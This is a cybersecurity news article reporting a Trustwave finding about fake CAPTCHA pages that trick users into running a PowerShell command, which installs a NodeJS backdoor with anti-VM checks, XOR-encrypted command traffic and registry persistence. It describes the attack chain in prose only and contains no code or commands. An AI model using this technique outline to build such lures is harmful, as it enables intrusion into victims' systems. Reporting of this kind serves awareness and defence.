This campaign represents a growing trend of threat actors exploiting seemingly legitimate security measures to distribute malicious code, targeting users who are accustomed to completing CAPTCHA challenges during their regular online activities. When users attempt to complete these CAPTCHA challenges, malicious PowerShell commands are covertly executed in the background, installing a NodeJS-based backdoor that provides attackers with persistent access to the victim’s system. A sophisticated malware campaign has emerged that deploys stealthy NodeJS backdoors through deceptive CAPTCHA verification screens, security researchers revealed today. The researchers also observed a resurgence in similar NodeJS-based backdoor deployments across multiple malware campaigns, including KongTuke, Fake CAPTCHA schemes, Mispadu, and Lumma stealers. When users visit these compromised sites, the injected script performs initial reconnaissance by collecting system information including operating system details, IP address, browser type, and geolocation data. “Given the effectiveness and high success rates of fake CAPTCHA techniques as an initial access vector compared to traditional methods, we anticipate continued growth and prevalence of these tactics,” noted the Trustwave report. The backdoor, dubbed YaNB (Yet Another NodeJS Backdoor), demonstrates advanced capabilities including system reconnaissance, command execution, and data exfiltration. These sites contain injected malicious code that loads JavaScript files, eventually leading victims to fake CAPTCHA verification pages. The user, believing they are completing a legitimate security verification, triggers a PowerShell command that downloads and installs Node.js and executes the backdoor. This backdoor employs sophisticated anti-VM techniques to evade analysis, checking for system characteristics that might indicate a virtual environment, such as memory size and computer name patterns. The NodeJS backdoor uses a custom XOR-based encryption mechanism for command and control communications and establishes persistence through registry modifications, disguising itself as a legitimate browser update service. Once fully operational, the malware can deploy additional payloads, including more advanced NodeJS RATs capable of tunneling malicious traffic through SOCKS5 proxies. As this campaign continues to evolve, organizations and users should remain vigilant when encountering CAPTCHA challenges, particularly on less familiar websites. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 02 May 2025 12:05:07 +0000